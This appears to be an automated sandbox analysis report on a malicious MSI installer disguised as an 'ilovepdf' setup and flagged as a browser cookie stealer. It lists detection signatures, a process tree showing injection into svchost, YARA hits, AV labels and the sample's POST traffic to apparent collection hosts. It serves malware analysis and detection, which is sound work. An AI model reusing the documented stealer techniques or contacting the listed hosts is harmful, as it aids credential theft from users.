Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6rfyiAq0nM

Overview

General Information

Sample Name:6rfyiAq0nM (renamed file extension from none to msi)
Analysis ID:508222
MD5:623673851fbb205eb0d1003cb892d4d6
SHA1:c541b4e10541bb0a6565ba8cc6b64d2480ef4437
SHA256:71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
Tags:msi
Infos:

Most interesting Screenshot:

Detection

Cookie Stealer
Score:74
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Cookie Stealer
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Allocates memory in foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to compare user and computer (likely to detect sandboxes)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to infect the boot sector
Contains functionality to steal Chrome passwords or cookies
Modifies the context of a thread in another process (thread injection)
Contains functionality to inject threads in other processes
Sets debug register (to hijack the execution of another thread)
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to enumerate running services
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6980 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 7056 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • MSIFBC3.tmp (PID: 4928 cmdline: C:\Windows\Installer\MSIFBC3.tmp MD5: B6D7559D31D4FF2D02338DF9CEF2FBD8)
      • MSIFBC3.tmp (PID: 6292 cmdline: 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp' MD5: D73DDB8F6B777CC6411FD3CA254F3DEC)
        • rundll32.exe (PID: 5336 cmdline: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • svchost.exe (PID: 2968 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • svchost.exe (PID: 6944 cmdline: C:\Windows\system32\svchost.exe -k SystemNetworkService MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 6212 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 996 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 256 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2320 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1512 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1124 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2468 cmdline: c:\windows\system32\svchost.exe -k netsvcs MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 664 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 2948 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1452 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1868 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1340 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 3444 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 5104 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\ilovepdf\is-93C0J.tmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0xed44a:$s1: \xAE\xB2\xB2\xB6\xFC\xE9\xE9

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x6646e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Click to see the 65 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
27.2.svchost.exe.2743a320000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
34.2.svchost.exe.202b28f0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
20.2.svchost.exe.1d91aad0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
24.2.svchost.exe.1dc51fb0000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
37.2.svchost.exe.1afba170000.0.unpackSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Click to see the 69 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Svchost ProcessShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5336, ProcessCommandLine: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 2968

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 6rfyiAq0nM.msiVirustotal: Detection: 31%Perma Link
Source: 6rfyiAq0nM.msiReversingLabs: Detection: 35%
Multi AV Scanner detection for domain / URLShow sources
Source: https://fg.mygameagend.com/report7.4.phpVirustotal: Detection: 5%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmpReversingLabs: Detection: 25%
Source: 13.2.rundll32.exe.4eb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 37.2.svchost.exe.1afba170000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 20.2.svchost.exe.1d91aad0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 28.0.svchost.exe.1111ac00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 24.0.svchost.exe.1dc51fb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 28.2.svchost.exe.1111ac00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 24.2.svchost.exe.1dc51fb0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 37.0.svchost.exe.1afba170000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 30.2.svchost.exe.1be5cd40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 17.0.svchost.exe.204f3380000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 27.2.svchost.exe.2743a320000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 34.2.svchost.exe.202b28f0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 16.2.svchost.exe.12e17870000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 34.0.svchost.exe.202b28f0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 19.2.svchost.exe.233426d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 23.2.svchost.exe.28621cd0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 29.0.svchost.exe.22f12740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 29.2.svchost.exe.22f12740000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 31.2.svchost.exe.21c23140000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 23.0.svchost.exe.28621cd0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 27.0.svchost.exe.2743a320000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 31.0.svchost.exe.21c23140000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 17.2.svchost.exe.204f3380000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 21.0.svchost.exe.2f2c5c00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 38.0.svchost.exe.25c96c80000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 25.2.svchost.exe.2216b8b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 30.0.svchost.exe.1be5cd40000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 22.0.svchost.exe.222cab20000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 22.2.svchost.exe.222cab20000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 14.2.svchost.exe.24b7d0d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 19.0.svchost.exe.233426d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 21.2.svchost.exe.2f2c5c00000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 38.2.svchost.exe.25c96c80000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 25.0.svchost.exe.2216b8b0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 14.0.svchost.exe.24b7d0d0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: 20.0.svchost.exe.1d91aad0000.0.unpackAvira: Label: TR/ATRAPS.Gen2
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198245C0 _fread_nolock,new,ImpersonateLoggedOnUser,CryptUnprotectData,RevertToSelf,LocalFree,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19821320 ImpersonateLoggedOnUser,CryptUnprotectData,RevertToSelf,LocalFree,
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:
Source: C:\Windows\System32\msiexec.exeFile opened: x:
Source: C:\Windows\System32\msiexec.exeFile opened: v:
Source: C:\Windows\System32\msiexec.exeFile opened: t:
Source: C:\Windows\System32\msiexec.exeFile opened: r:
Source: C:\Windows\System32\msiexec.exeFile opened: p:
Source: C:\Windows\System32\msiexec.exeFile opened: n:
Source: C:\Windows\System32\msiexec.exeFile opened: l:
Source: C:\Windows\System32\msiexec.exeFile opened: j:
Source: C:\Windows\System32\msiexec.exeFile opened: h:
Source: C:\Windows\System32\msiexec.exeFile opened: f:
Source: C:\Windows\System32\msiexec.exeFile opened: b:
Source: C:\Windows\System32\msiexec.exeFile opened: y:
Source: C:\Windows\System32\msiexec.exeFile opened: w:
Source: C:\Windows\System32\msiexec.exeFile opened: u:
Source: C:\Windows\System32\msiexec.exeFile opened: s:
Source: C:\Windows\System32\msiexec.exeFile opened: q:
Source: C:\Windows\System32\msiexec.exeFile opened: o:
Source: C:\Windows\System32\msiexec.exeFile opened: m:
Source: C:\Windows\System32\msiexec.exeFile opened: k:
Source: C:\Windows\System32\msiexec.exeFile opened: i:
Source: C:\Windows\System32\msiexec.exeFile opened: g:
Source: C:\Windows\System32\msiexec.exeFile opened: e:
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040AEF4 FindFirstFileW,FindClose,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E6A0 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0060BC10 FindFirstFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB56D0 FindFirstFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EE97D9 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D110478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B0478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805CF4 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C0478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 1948 DNS zone transfer UDP 192.168.2.3:60785 -> 34.64.183.91:53
Source: TrafficSnort IDS: 1948 DNS zone transfer UDP 192.168.2.3:53947 -> 34.64.183.91:53
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\svchost.exeDomain query: toa.mygametoa.com
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: fg.mygameagend.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 558Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 254Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exehttp://support.app
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
